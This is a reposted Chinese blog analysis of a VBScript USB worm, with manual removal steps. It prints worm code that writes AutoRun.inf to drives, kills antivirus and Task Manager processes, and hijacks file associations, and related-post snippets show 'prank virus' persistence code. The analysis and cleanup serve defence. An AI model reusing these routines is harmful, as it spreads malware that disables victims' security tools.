.vbs病毒代码小小分析以及手动查杀

最新推荐文章于 2024-07-11 16:17:50 发布
最新推荐文章于 2024-07-11 16:17:50 发布
阅读量286 收藏
点赞数
文章标签: 操作系统 运维 shell
原文链接:http://www.cnblogs.com/budaolonghu/archive/2009/11/28/1612811.html
版权

最近网络上流行起一种新的病毒,是以是以vbs为后缀名的小病毒!

下面我们来此解析此种病毒,以及它的变异型的病毒!

此种病毒的主要症状是
1.任务管理器自动关闭,大概打开后5秒左右。
2.不能显示隐藏文件。
3.感染时间过长,开机还会弹出窗口,提示感染文件超过2000个,与某某联系如何解决病毒之类。
4.自动搜索插在计算机上的移动磁盘,并生成AutoRun.inf和.vbs文件放到磁盘中。
5.Wscript.exe进程存在。
6.杀毒软件不报。。。。。(我之前在导师那里用过一次U盘,回来打开不小心,以为老师那里是瑞星,应该没什么问题吧。回来就发现不对劲。自己的NOD32就不报。)。
这个病毒危害倒不大,只是搞的很烦。
其实自己看看这些代码,觉得还挺有意思的哦。有些自己拿来用用也不错……
摘取一些代码:
1.生成Autorun.inf
Sub AutoRun(objfso, D, vbsCode)
On Error Resume Next
Dim path_autorun, path_vbs, inf_autorun
path_autorun = D & ":\AutoRun.inf"
path_vbs = D & ":\" & Name_V1
If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
End If
If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
End If
Call CopyFile(objfso, vbsCode, path_vbs)
Call SetFileAttr(objfso, path_vbs)
inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
Call CopyFile(objfso, inf_autorun, path_autorun)
Call SetFileAttr(objfso, path_autorun)
End If
End Sub

2.搜索进程,并选择关闭和杀毒,以及其它有关的进程。
 Sub MonitorSystem(objfso, vbsCode)
 On Error Resume Next
 Dim ProcessNames
 ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
<可以看到有瑞星,360,任务管理器,msconfig.exe,和USB病毒专杀都在里面了。>
 Do
 Call KillProcess(ProcessNames)
 Call InvadeSystem(objfso, vbsCode)
 WScript.Sleep 5000 <哈哈,5000毫秒。。。>
 Loop
End Sub
3.修改TXT,REG,CHM,HLP文件的默认打开方式
Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
然后是这个。。。很有意思:

If Order_Para>2000 Then
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else

貌似作者以为这个很牛啊,还的让人教怎么清除。。。不过确实这个杀毒软件不报病毒。。。
不扯了,把这个传上来,大家看看研究研究吧,可以提高点电脑知识。
最后说说怎么去掉这个吧。。。。本人喜欢手动,就不写什么批处理了。。。

1.可以打开任务管理器,发挥自己最快的速度。。。结束掉Wscript.exe进程(5秒之内)。。。最蠢最懒的办法,哈哈我就是这样做的。或者直接进入安全模式杀吧,或者用其它的工具结束掉此进程。
2. 显示目录下所有的文件,包括受系统保护的文件。
打开注册表(开始--运行--输入regedit)找到:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
项目,修改其值为1
3.到个磁盘目录下删除名称为自己主机名的扩展名为.VBS的文件以及AUTORUN.inf的文件。
4.然后是:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
里面的有.vbs项结束掉(基本上所有的和AUTORUN.INF之类的病毒都可以用这种方式删除。。不过一般其它的病毒都会有守护着的进程监视着[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]项的值,所以其它的还是在安全模式下这样操作)
5.剩下的就是其它的隐藏着的VBS的文件了。一般会在C:\WINDOWS和C:\WINDOWS\SYSTEM和C:\WINDOWS\SYSTEM32路径下面留有一些残余,类似为`.vbs,`.vba或者(你的计算机名字).vbs,用搜索工具搜索.VBS和.VBA就可以了,删除之,最后清空自己的浏览器缓存,以及浏览历史记录以及清空C:\Documents and Settings\Administrator\Local Settings\Temp目录。
6.然后就是恢复TXT,REG,CHM,HLP的文件关联了,这个……,最简单的办法,直接对文件右键,选择打开方式,选择正确的打开程序,并勾选始终使用这个打开就可以了。(受感染的文件会把文件的默认打开方式设定为WSCRIPT.exe执行病毒程序)
7.完工重启?。。。

最后,关于WSCRIPT.EXE
wscript.exe
进程文件: wscript 或者 wscript.exe
进程名称: Microsoft Windows Script Host
描述:
wscript.exe是微软Microsoft Windows操作系统脚本相关支持程序

 

转载于:https://www.cnblogs.com/budaolonghu/archive/2009/11/28/1612811.html

weixin_30652879
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vbs整人小病毒2
ZQX112233的博客
04-05 695
海螺,大家好! 这是我第二次发文章,点个赞再走吧!(✪ω✪) Thanks♪(・ω・)ノ (还有关注!) 好!直接上代码: Dim AutoRunProgram Set AutoRunProgram = WScript.CreateObject("WScript.shell") RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" Type_Name = "REG_SZ" Key_Name = "gam..
vbs 脚本2
weixin_30511039的博客
04-06 5489
一些很恶作剧的vbs程序代码 作者: 字体:[增加减小] 类型:转载 时间:2013-01-16我要评论 恶作剧的vbs代码,这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处,最多关机重启一下就可以了,将下面的任意一段代码保存为*.vbs即可 操作方法:把代码保存为*.VBS运行即可经本人亲自测试 不会出大问题的,一般都是利用无限循环,不是死循环,...
教大家五个整朋友的VBS、BAT小病毒
A_239LANt的博客
02-04 1367
教大家五个整朋友的VBS、BAT小病毒
VBS弹窗小病毒(无害)
zym95661的博客
12-14 829
代码VBS弹小病毒(无害)
VBS病毒—小病毒2
PythonIDLE3的博客
06-29 487
病毒程序要慎用!!!
vbs病毒
Zengkaichen的博客
10-14 4590
大家好,那今天小编的要给大家分享一个我搜集一个vbs病毒。 这个病毒仅供参考,在还没有读懂源码之前(因为我是搜集来的代码,所以其实我自己也不懂,嘿嘿嘿......望大佬指教。),请不要运行代码!!(很重要) 有一点,这个病毒是我供给大家学习的,请不要用作非法用途,造成任何后果与本人无关。 那话不多说,直接上源码: On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set dir1=fs.GetSpecial
VBS简介、实例(一)—— 整蛊小病毒
Tang961216的博客
02-22 1963
VBS的简介、实例
Autorun.vbs病毒专杀工具
04-02
"Autorun.vbs病毒专杀工具其它知识" 这个标签表明除了专杀工具本身,压缩包内可能还包括了关于这种病毒的更多信息,比如病毒的工作原理、传播方式、危害以及如何防止病毒感染等。这些额外的知识对于用户全面理解并...
Autorun.vbs病毒专杀工具.rar
09-26
标题中的“Autorun.vbs病毒专杀工具.rar”表明这是一个针对特定病毒的解决方案,该病毒被称为Autorun.vbs。在Windows系统中,autorun.inf文件常被用来自动执行磁盘上的程序,而当这种功能被恶意利用时,就可能成为...
autorun.vbs病毒查杀
03-05
查杀病毒的步骤通常包括: 1. 断开所有可移动设备的连接,避免病毒进一步传播。 2. 启用并更新防病毒软件,确保病毒库是最新的。 3. 运行提供的查杀工具,如kill_auto.exe和AutoGuarder.exe,按照Readme-说明.html...
encrypt.vbs 内容加密vbs实现代码
09-05
《使用VBScript实现内容加密——encrypt.vbs代码详解》 在信息技术领域,数据安全是至关重要的,而数据加密则是保障信息安全的重要手段之一。VBScript(Visual Basic Script)是一种轻量级的脚本语言,常用于...
Script.VBS.Agent.ai juan.vbs专杀
09-06
Script.VBS.Agent.ai juan.vbs专杀
病毒autorun.vbs查杀方法
weixin_34268579的博客
11-12 179
最近机器有个怪现象,打开“我的电脑”以后,无论双击哪个盘的图标,系统都会重新打开一个窗口,同时杀毒软件报告:regedit.exe程序试图修改注册表XXX键值,已被拦截。 然 后我打开硬盘各个分区,发现根目录下多出七个文件:autorun.bat autorun.vbs autorun.bin autorun.inf autorun.txt auto...
vbs病毒代码及其分析
11-22 2907
On Error Resume NextSet fs=CreateObject("Scripting.FileSystemObject")Set dir1=fs.GetSpecialFolder(0)Set dir2=fs.GetSpecialFolder(1)Set so=CreateObject("Scripting.FileSystemObject")dim rSet r=CreateObj
Windows小病毒:吓人但无危害
2301_77765180的博客
07-15 764
免责声明:运行本文中的项目导致与朋友闹翻、被对象甩、电脑冒烟,本人概不负责😂。本系列小病毒可用记事本编辑,编辑好后命名为“惊喜.vbs”,双击即可运行。注意:该文件只能命名为boo.bat,不然会报错。运行有风险,尝试需谨慎。连截屏都截不了,只能拍照了。本系列用记事本编辑后命名为“名字.bat”,双击运行即可。只要你按“否”,弹窗就不会关闭。解决办法很简单,关机就行了。这时,按“确定”即可退出。二、批处理文件(bat)版。(2)大佬级:打开窗口。(3)大神级:死循环。
vbs计算机病毒代码,一段病毒常用的VBS代码
weixin_36298146的博客
07-28 2070
On error resume nextDim fso,wshell,curfolder,curdristr,curdriSet fso=createobject("scripting.filesystemobject")Set wshell=CreateObject("WScript.shell")Set curfolder=fso.GetFolder(".")curdristr=Left(WS...
最全的vbs病毒代码,you破坏性的。
热门推荐
暖心少年
08-20 2万+
On Error Resume Next dim avest,xufso,wscrt Set avest = WScript.Createobject("WScript.Shell") Set wscrt = WScript.Createobject("WScript.Shell") Set xufso = CreateObject("Scripting.FileSystemObject") av...
怎样防范vbs脚本病毒
persistence勿忘初心
12-13 2037
https://blog.csdn.net/persistencegoing/article/details/84376427 大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript &lt;!DOCTYPE html&gt; &lt;html&gt;         &lt;head&gt;                 &lt;me...
看ros的某个节点发出的信息的linux指令
最新发布
嵌入式行业打工人,不定期更新博客。
07-11 286
在ROS (Robot Operating System) 中,如果你想查看某个特定节点发布到某个话题上的消息,你可以使用。命令,但是这将显示关于节点的一般信息,而不是它发布的消息数据。请记住,为了使用这些命令,你需要确保你的ROS环境已经被正确设置,通常是通过运行。这个命令可以让你实时地看到一个话题上发布的消息数据。确保替换上述命令中的路径为你实际的ROS工作空间路径。如果你不确定消息的类型,可以先用。如果你知道消息的类型,也可以加上。此外,如果你想查看节点的日志信息,可以使用。假设你想要查看由节点。
pyqt调用update.vbs文件的代码
03-31
由于update.vbs是一个Windows脚本文件,PyQt本身无法直接调用它。但你可以使用Python的os模块来启动一个新的进程并执行update.vbs文件。 下面是一个示例代码: ```python import os # 定义update.vbs文件路径 vbs_file = 'C:\\path\\to\\update.vbs' # 使用os模块启动一个新进程并执行vbs文件 os.system('start ' + vbs_file) ``` 请注意,此代码只在Windows操作系统上有效,因为update.vbs是一个Windows脚本文件。如果你想在其他操作系统上运行类似的代码,请考虑使用适合该操作系统的脚本语言。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值